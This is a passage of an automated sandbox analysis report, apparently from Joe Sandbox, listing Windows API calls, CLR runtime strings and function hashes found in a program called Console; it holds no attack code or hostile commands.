                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 010D88E4
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D88F1
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000114,000000FF,00000000,00000000,00000000,00000000), ref: 010D8912
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D891D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$FreeHeapfreemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 354066558-0
APIs
• GetProcessHeap.KERNEL32(?,00000000,00000000,00000000,?,01466253,?,00000011,00000004), ref: 0147830D
• HeapAlloc.KERNEL32(00000000,00000000,?,?,01466253,?,00000011,00000004), ref: 01478316
• EncodePointer.KERNEL32(00000000,?,01466253,?,00000011,00000004), ref: 01478323
• EncodePointer.KERNEL32(?,?,01466253,?,00000011,00000004), ref: 01478335
• EncodePointer.KERNEL32(?,?,01466253,?,00000011,00000004), ref: 0147833E
Similarity
• API ID: EncodePointer$Heap$AllocProcess
• String ID:
• API String ID: 3053055170-0
APIs
• FlushFileBuffers.KERNEL32(?,00000000,012D732D,00000014,?), ref: 012528A0
• DisconnectNamedPipe.KERNEL32(?), ref: 012528AF
• CloseHandle.KERNEL32(?), ref: 012528B8
• CloseHandle.KERNEL32(?,00000000,012D732D,00000014,?), ref: 012528CE
• free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,012D732D,00000014,?), ref: 012528FC
Similarity
• API ID: CloseHandle$BuffersDisconnectFileFlushNamedPipefree
• String ID:
• API String ID: 4191446590-0
APIs
Strings
• AMP Budget: pressure=%llu ? budget=%llu (total_added=%llu, total_removed=%llu, mng_heap=%llu) pos=%d, xrefs: 010C04F1
• AMP Add: %llu => added=%llu total_added=%llu total_removed=%llu, xrefs: 010C019D
Similarity
• API ID: FreeHeap__aulldiv
• String ID: AMP Add: %llu => added=%llu total_added=%llu total_removed=%llu$AMP Budget: pressure=%llu ? budget=%llu (total_added=%llu, total_removed=%llu, mng_heap=%llu) pos=%d
• API String ID: 445004715-2332714957
APIs
• GetEnvironmentVariableW.KERNEL32(?,00000000), ref: 0122CBD2
• GetLastError.KERNEL32 ref: 0122CC00
• SetLastError.KERNEL32(00000000,00000000), ref: 0122CD0A
Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                                                                          • String ID: COMPlus_
                                                                                                                                                                                                                          • API String ID: 2691138088-665472478
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,00000000,?,?,01013FD2,7CAB6A82,?,?,?,?,?), ref: 010117FB
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(80000003,00000000,80000003,016371B8,?,?,?,?), ref: 01011872
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 01011879
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExceptionFilterTerminateUnhandled
                                                                                                                                                                                                                          • String ID: StatusBreakpoint
                                                                                                                                                                                                                          • API String ID: 3985764695-3554155703
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 0122CE91
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: GetLastError.KERNEL32 ref: 0122CE9F
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: SetLastError.KERNEL32(00000000), ref: 0122CFD4
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReportFault), ref: 010108F7
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,01010A44,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010915
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                                                                                          • String ID: FaultRep.dll$ReportFault
                                                                                                                                                                                                                          • API String ID: 1529210728-3658453154
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,00000000,?), ref: 0109758C
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(Fatal error. ), ref: 01097596
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,Fatal error. ,00007FFF,?,00000000,00000000), ref: 010975C5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHandleWritestrlen
                                                                                                                                                                                                                          • String ID: Fatal error.
                                                                                                                                                                                                                          • API String ID: 1058883207-2319153378
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 012BC2C5
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BC355
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BC393
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BC43A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BC456
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 753f0b1b0f7d515c3ef8d7ab4a78a17cbc284eba5df2ee017fcdd9f68e873fb0
                                                                                                                                                                                                                          • Instruction ID: 277b85191485b0ca214f74c46e864dbff1db4c4875b07f1af9c5bcaa65a45357
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 753f0b1b0f7d515c3ef8d7ab4a78a17cbc284eba5df2ee017fcdd9f68e873fb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03B17D71D102099FDF21DFA8D884BEEBBB8EF18344F54412AEA05FB251D730AA55CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 012C64EA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C657A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C65B8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C665B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6677
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: b45130f4d3ddff54361b9a197710704a5e6eebc5c80d0b346805f2e59df5bfc5
                                                                                                                                                                                                                          • Instruction ID: 7b0727c691278d13d3aeb304baad3c03698ad594f125b13d8de48062718c4c9d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b45130f4d3ddff54361b9a197710704a5e6eebc5c80d0b346805f2e59df5bfc5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4B18071D102199FDB21CFA8D884BDEBBB8EF18744F14422EEA05A7341E734A955CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00FC2517,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252B37
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252B4D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252B63
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00FC2517,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252BA4
                                                                                                                                                                                                                            • Part of subcall function 01252C20: HeapFree.KERNEL32(00000000,00000000,00000000,7CAB6A82,00000000,00000000,8007000E), ref: 01252CBF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252BFA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 1da076826a9398ed0a5b7ce93902ed722bb078af104da257cd231fdf16200a72
                                                                                                                                                                                                                          • Instruction ID: afe4ad6e6cd060271f1c17f264e44467d1726c15f30b0b03924d1f41d33be8a7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1da076826a9398ed0a5b7ce93902ed722bb078af104da257cd231fdf16200a72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E517C74A10206DFDB25DF58D9C0BAABBB8FF05711F2441A9EE05AB295E731D910CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B2E2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B30C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B336
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B360
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B390
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 4bdb916d8265f1b733886ca29ac684d4fd61689dbd99d4c90e9b82eb5ab030e0
                                                                                                                                                                                                                          • Instruction ID: 604b1edb9808df0f0d7a8d7992a464ddfb312f8311de1460fa61629fcf5c8550
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdb916d8265f1b733886ca29ac684d4fd61689dbd99d4c90e9b82eb5ab030e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9731B270910385EFEB61CF69CE88B99BFF8AB05710F248299ED45E77A1D3709A14CB11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,?,00000000), ref: 00FEBB0A
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,?,00000000), ref: 00FEBC34
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 00FEBCEF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 00FEBD18
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82,00000002), ref: 00FCF12B
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82), ref: 00FCF197
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$strcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2606610500-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00000002,?,7CAB6A82,00000000,?,00000000,0164A1AC,?,00000004,00000000,7CAB6A82,?,00000002,?,000000FF), ref: 01225A2D
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00000002,?,7CAB6A82,00000000,00000000,00000000,0164A1AC,7CAB6A82,?,00000002,?,000000FF,?,01219711,000010FF,00000000), ref: 01225ABA
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000,-00000002,00000004,00000000,?,00000002,?,000000FF,?,01219711,000010FF,00000000), ref: 01225B3E
                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000002,?,000000FF,?,01219711,000010FF,00000000), ref: 01225B65
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FormatFreeMessage$HeapLocalwcscpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2823936367-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,7CAB6A82,?,?), ref: 00FEDB04
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,7CAB6A82,?,?), ref: 00FEDC46
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FEDD26
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FEDD4F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeapstrcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2616603090-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000008,?,?), ref: 01089711
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0108977E
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 01089819
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?), ref: 01089870
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateEvent$Heap$AllocateCriticalInitializeProcessSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2365403526-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 01184874
                                                                                                                                                                                                                            • Part of subcall function 00FCDE20: HeapFree.KERNEL32(00000000,?,7CAB6A82,7CAB6A82,?), ref: 00FCDEC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: Contract details: $Exception Info: $Message:
                                                                                                                                                                                                                          • API String ID: 3298025750-1860525982
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(7CAB6A82), ref: 01014377
                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?), ref: 010144E8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • CLRVectoredExceptionHandlerShim: returning %d, xrefs: 010144C3
                                                                                                                                                                                                                          • CLRVectoredExceptionShim: mismatch of cached and current stack-base indicating use of Fibers, return with EXCEPTION_CONTINUE_SEARCH: current = %p; cache = %p, xrefs: 01014458
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                          • String ID: CLRVectoredExceptionHandlerShim: returning %d$CLRVectoredExceptionShim: mismatch of cached and current stack-base indicating use of Fibers, return with EXCEPTION_CONTINUE_SEARCH: current = %p; cache = %p
                                                                                                                                                                                                                          • API String ID: 1452528299-526770326
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0159BAA1,000000FF,00000000,00000000,7CAB6A82), ref: 01226D8A
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,0159BAA1,000000FF,00000000,00000000,00000000), ref: 01226DBF
                                                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(00000000), ref: 01226DD4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01226DF4
                                                                                                                                                                                                                            • Part of subcall function 00FCD660: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD68B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFreeHeapMultiWide$DebugOutputString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3187996580-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000001,?,?,010A9E33), ref: 010AAD9F
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,010A9E33), ref: 010AAD88
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,010A9E33), ref: 010AADF2
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000001,?,?,010A9E33), ref: 010AAE09
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heapstrcpy_sstrlen$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 512183944-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD68B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD6BE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD6EE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: ResumeThread
                                                                                                                                                                                                                          • API String ID: 3298025750-947044025
                                                                                                                                                                                                                          • Opcode ID: de4867a2884ac2e1bc9a544c1c6086971d3ee7aa85b9eb2cae0c5763c5309ef0
                                                                                                                                                                                                                          • Instruction ID: 0b9eeb269f982c11b736e3c7a11d697b37f4faccb8069481b720646e85e63d97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de4867a2884ac2e1bc9a544c1c6086971d3ee7aa85b9eb2cae0c5763c5309ef0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A511C1B16003029FE3308F0AEA85B2AF7E8EF50311F10843EE59AC3660D7B1A810EB40
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 01226249
                                                                                                                                                                                                                          • VerSetConditionMask.KERNEL32(00000000), ref: 01226251
                                                                                                                                                                                                                          • VerSetConditionMask.KERNEL32(00000000), ref: 01226259
                                                                                                                                                                                                                          • VerifyVersionInfoW.KERNEL32 ref: 01226281
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2793162063-0
                                                                                                                                                                                                                          • Opcode ID: a12a61817cae358d3cd321c950248aa01ec0fc358c115e751a9931aac5ab32ec
                                                                                                                                                                                                                          • Instruction ID: 8b48709f32b8c9f0ef0976a01b719e87cb92626f3989ea2d976b6126a89327ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a12a61817cae358d3cd321c950248aa01ec0fc358c115e751a9931aac5ab32ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1111FB15443006FE7309F61DD0ABAB76E8EF98B01F01491DB585D62D0D77456248B96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,010D8767,00000000,00000000,00000000,?), ref: 010D848B
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,010E0370,?,00000000,00000001,00000000,?,00000000,00000000,00000000,00000001), ref: 010D8498
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 010D84B7
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D84C2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                                                                          • Opcode ID: 689775aedb3cab57611d593e4167bad485f37e8b5984ae6858c0d72a81785d55
                                                                                                                                                                                                                          • Instruction ID: 32af1070164af80c44d921672e8685eda0361f181af1dac0ce71c663b451ccba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 689775aedb3cab57611d593e4167bad485f37e8b5984ae6858c0d72a81785d55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF0F67534132237F63112691C49F17698C8B81F32F26463EFB14B92D4DE81941042A6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(00008001,00000000), ref: 01097919
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 0122CE91
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: GetLastError.KERNEL32 ref: 0122CE9F
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: SetLastError.KERNEL32(00000000), ref: 0122CFD4
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 01097934
                                                                                                                                                                                                                          • SetThreadErrorMode.KERNEL32(00000000,00000000), ref: 0109794E
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 01097955
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Last$ModeThread$LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3861856538-0
                                                                                                                                                                                                                          • Opcode ID: 6783d771dcac7a4889015fb15c6cc57c94424b187cd26dc862f903df37a78b73
